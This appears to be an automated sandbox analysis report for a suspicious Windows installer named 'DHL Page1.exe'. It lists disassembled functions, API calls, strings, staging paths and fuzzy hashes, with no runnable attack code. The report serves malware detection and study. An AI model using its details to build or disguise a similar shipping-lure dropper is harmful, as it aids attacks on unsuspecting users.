Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 9bd2f6d74ac247820c12bebba16c1e001984a9df0bf48ad471536ea90c0b1b10
Instruction ID: a703cb75f634f3ec2f8c408dc1cec4c4b09ca059f915735dd03d2a96a2a1da7c
Opcode Fuzzy Hash: 9bd2f6d74ac247820c12bebba16c1e001984a9df0bf48ad471536ea90c0b1b10
Instruction Fuzzy Hash: 2AD0C931554120ABC2401A686D0C88B6B589F1A3317218F36F46AF12E4C6348C2286A8

Function 0040287E Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040288D

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 22f707ac0aa1d49a4811a4d856013a69053f4eeaacfc01aa520fbec7f3017ab5
Instruction ID: 901597bed985556817bf4c53fc3ba8f4a1014b349e76ad9d86058ed67dbacc8e
Opcode Fuzzy Hash: 22f707ac0aa1d49a4811a4d856013a69053f4eeaacfc01aa520fbec7f3017ab5
Instruction Fuzzy Hash: B4F0A771A04114EBDB00EBE4D9499EDB378EF04314F2185BBE112F31D0DBB88981DB29

Function 00403E20 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E5C
ShowWindow.USER32(?), ref: 00403E79
DestroyWindow.USER32 ref: 00403E8D
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EA9
GetDlgItem.USER32(?,?), ref: 00403ECA
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403EDE
IsWindowEnabled.USER32(00000000), ref: 00403EE5
GetDlgItem.USER32(?,?), ref: 00403F93
GetDlgItem.USER32(?,00000002), ref: 00403F9D
SetClassLongW.USER32(?,000000F2,?), ref: 00403FB7
SendMessageW.USER32(0000040F,00000000,?,?), ref: 00404008
GetDlgItem.USER32(?,00000003), ref: 004040AE
ShowWindow.USER32(00000000,?), ref: 004040CF
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040E1
EnableWindow.USER32(?,?), ref: 004040FC
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404112
EnableMenuItem.USER32(00000000), ref: 00404119
SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404131
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404144
lstrlenW.KERNEL32(0042D288,?,0042D288,00433F20), ref: 0040416D
SetWindowTextW.USER32(?,0042D288), ref: 00404181
ShowWindow.USER32(?,0000000A), ref: 004042B5

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: dbea649e9c82ebbcea8c96967e97527dc105f753dd70e098ace6a910ed38952d
Instruction ID: 5d4a2332395b3617a468ab545525e3c53a606f051c31be556a205d5f1676e1a4
Opcode Fuzzy Hash: dbea649e9c82ebbcea8c96967e97527dc105f753dd70e098ace6a910ed38952d
Instruction Fuzzy Hash: 67C1D1B1A00205FFCB21AF61EE45E2B3B78EB84346B00057EF641B11F0CB7998529B2D

Function 00403A7D Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040660E: GetModuleHandleA.KERNEL32(?,00000020,?,004034D5,00000009), ref: 00406620
Part of subcall function 0040660E: GetProcAddress.KERNEL32(00000000,?), ref: 0040663B

lstrcatW.KERNEL32(1033,0042D288,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D288,00000000,00000002,754F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Page1.exe",00000000), ref: 00403AFE
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage,1033,0042D288,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D288,00000000,00000002,754F3420), ref: 00403B7E
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage,1033,0042D288,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D288,00000000), ref: 00403B91
GetFileAttributesW.KERNEL32(Call), ref: 00403B9C
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage), ref: 00403BE5

Part of subcall function 0040617B: wsprintfW.USER32 ref: 00406188

RegisterClassW.USER32(00433EC0), ref: 00403C22
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C3A
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C6F
ShowWindow.USER32(00000005,00000000), ref: 00403CA5
GetClassInfoW.USER32(00000000,RichEdit20W,00433EC0), ref: 00403CD1
GetClassInfoW.USER32(00000000,RichEdit,00433EC0), ref: 00403CDE
RegisterClassW.USER32(00433EC0), ref: 00403CE7
DialogBoxParamW.USER32(?,00000000,00403E20,00000000), ref: 00403D06

Strings

"C:\Users\user\Desktop\DHL Page1.exe", xrefs: 00403A81
C:\Users\user\AppData\Local\Temp\, xrefs: 00403A82
Control Panel\Desktop\ResourceLocale, xrefs: 00403AB1
RichEd20, xrefs: 00403CAB
RichEd32, xrefs: 00403CB9
_Nb, xrefs: 00403C01, 00403C69
1033, xrefs: 00403A9D, 00403AF9
Call, xrefs: 00403B45, 00403B4E, 00403B5C, 00403BAB, 00403BB1
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage, xrefs: 00403B0D, 00403B15, 00403BB8, 00403BBE, 00403BCE
.exe, xrefs: 00403B8B
RichEdit, xrefs: 00403CD8
RichEdit20W, xrefs: 00403CC9, 00403CCF
.DEFAULT\Control Panel\International, xrefs: 00403AE9

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\DHL Page1.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-338002893
Opcode ID: a561812ab1fe1cbf548fa405dc37b3d045f86977ed6f2db7d55feea5111cc6ed
Instruction ID: bf0328bd4fded2bfb524b3e6ced6939b2aeeb15d4dd665303d08d6fe64e2be02
Opcode Fuzzy Hash: a561812ab1fe1cbf548fa405dc37b3d045f86977ed6f2db7d55feea5111cc6ed
Instruction Fuzzy Hash: D161A8311402006FE720AF66AD46F6B3A7CEB84B4AF40057FF941B61E2DB7D9941CA2D

Function 00402ED5 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 209
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402EE9
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL Page1.exe,00000400), ref: 00402F05

Part of subcall function 00405E09: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\DHL Page1.exe,80000000,00000003), ref: 00405E0D
Part of subcall function 00405E09: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405E2F

GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL Page1.exe,C:\Users\user\Desktop\DHL Page1.exe,80000000,00000003), ref: 00402F4E
GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403095

Strings

"C:\Users\user\Desktop\DHL Page1.exe", xrefs: 00402ED5
Inst, xrefs: 00402FBC
C:\Users\user\AppData\Local\Temp\, xrefs: 00402EDF, 004030B5
@, xrefs: 0040309F
soft, xrefs: 00402FC5
Null, xrefs: 00402FCE
C:\Users\user\Desktop\DHL Page1.exe, xrefs: 00402EEF, 00402EFE, 00402F12, 00402F2F
C:\Users\user\Desktop, xrefs: 00402F30, 00402F35, 00402F3B
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403102
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403150
Error launching installer, xrefs: 00402F25

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: @$"C:\Users\user\Desktop\DHL Page1.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL Page1.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-309988298
Opcode ID: c2fb4f21c120d56b51879791914385b9b913d8ca1c5293dc7937f3d1c81676d6
Instruction ID: c540003cd6e5ba405c0808e63ef80da0eb25dd1bee470730ffd1ed20f91e81f0
Opcode Fuzzy Hash: c2fb4f21c120d56b51879791914385b9b913d8ca1c5293dc7937f3d1c81676d6
Instruction Fuzzy Hash: C171C371A01204ABDB20EF65DD85A9E7FB8EB08319F20417BF504B72D1D7789A40CB5C

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage,?,?,00000031), ref: 004017D5

Part of subcall function 00406234: lstrcpynW.KERNEL32(?,?,00000400,00403519,00433F20,NSIS Error), ref: 00406241

Part of subcall function 00405393: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053CB
Part of subcall function 00405393: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053DB
Part of subcall function 00405393: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00402EAD,00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000), ref: 004053EE
Part of subcall function 00405393: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll), ref: 00405400
Part of subcall function 00405393: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405426
Part of subcall function 00405393: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405440
Part of subcall function 00405393: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040544E

Strings

C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll, xrefs: 00401835, 00401851
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage, xrefs: 0040179E
Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nsv4331.tmp, xrefs: 00401821, 0040183F

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage$C:\Users\user\AppData\Local\Temp\nsv4331.tmp$C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll$Call
API String ID: 1941528284-3511587426
Opcode ID: 4f3913196afc35370aff70a88b408c4098ea441a68e99e2207c7708e4b16c304
Instruction ID: e6f05f3904b1859601f1eb2940c1b1717384ade9966e36b1bb5c3cc2a0af8de2
Opcode Fuzzy Hash: 4f3913196afc35370aff70a88b408c4098ea441a68e99e2207c7708e4b16c304
Instruction Fuzzy Hash: 4941D471900518BACF107FA5CD45EAF3A79EF45368B20423FF522B10E1DB3C8A519A6E

Function 00405393 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053CB
lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053DB
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00402EAD,00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000), ref: 004053EE
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll), ref: 00405400
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405426
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405440
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040544E

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll, xrefs: 004053B4, 004053C4, 004053CA, 004053ED, 004053F9

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll
API String ID: 2531174081-233680663
Opcode ID: 26d9079ffcafc08359c587dfddb640d82b2c93ffd26b5b2690ef6886057d76cb
Instruction ID: 904dcc14be42eb9ecd8d2d74964ba25456134f8d930e436489d38a2ea5572984
Opcode Fuzzy Hash: 26d9079ffcafc08359c587dfddb640d82b2c93ffd26b5b2690ef6886057d76cb
Instruction Fuzzy Hash: D7219D71900518BACB11AF95DD84ACFBFB9EF49754F10807AFA04B22A1C7794A90CF68

Function 004032A5 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004032B9

Part of subcall function 00403424: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403124,?), ref: 00403432

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031CF,00000004,00000000,00000000,?,?,0040314B,000000FF,00000000,00000000,0040A230,?), ref: 004032EC
SetFilePointer.KERNELBASE(000066A1,00000000,00000000,0A,0041EA30,00004000,?,00000000,004031CF,00000004,00000000,00000000,?,?,0040314B,000000FF), ref: 004033E7

Strings

0jA, xrefs: 004032FE
0A, xrefs: 00403319
0A, xrefs: 00403333, 00403370

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: FilePointer$CountTick
String ID: 0jA$0A$0A
API String ID: 1092082344-3318826540
Opcode ID: ce0f25341845d2d3b1ec7cd88536509013ef739379c7664023bb692e7d00efca
Instruction ID: a8c061a94c289a4b900e1fa10581d26637340338de3d2ebac52199189ebde602
Opcode Fuzzy Hash: ce0f25341845d2d3b1ec7cd88536509013ef739379c7664023bb692e7d00efca
Instruction Fuzzy Hash: EE316D72600201EFD7349F69EFC592A3FA8E751356754023BE801B6AE0CBB89941DB9D

Function 00405862 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004058A5
GetLastError.KERNEL32 ref: 004058B9
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004058CE
GetLastError.KERNEL32 ref: 004058D8

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405888
C:\Users\user\Desktop, xrefs: 00405862

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-26219170
Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
Instruction ID: 93ef74410eabf74c9f5bfa93548421830951063b51e5df95971d9266e6c6e1f8
Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
Instruction Fuzzy Hash: 53011A72D00619EAEF119FA0CA447EFBBB8EF04344F10803ADA45F6280D7789614CFA9

Function 0040659E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065B5
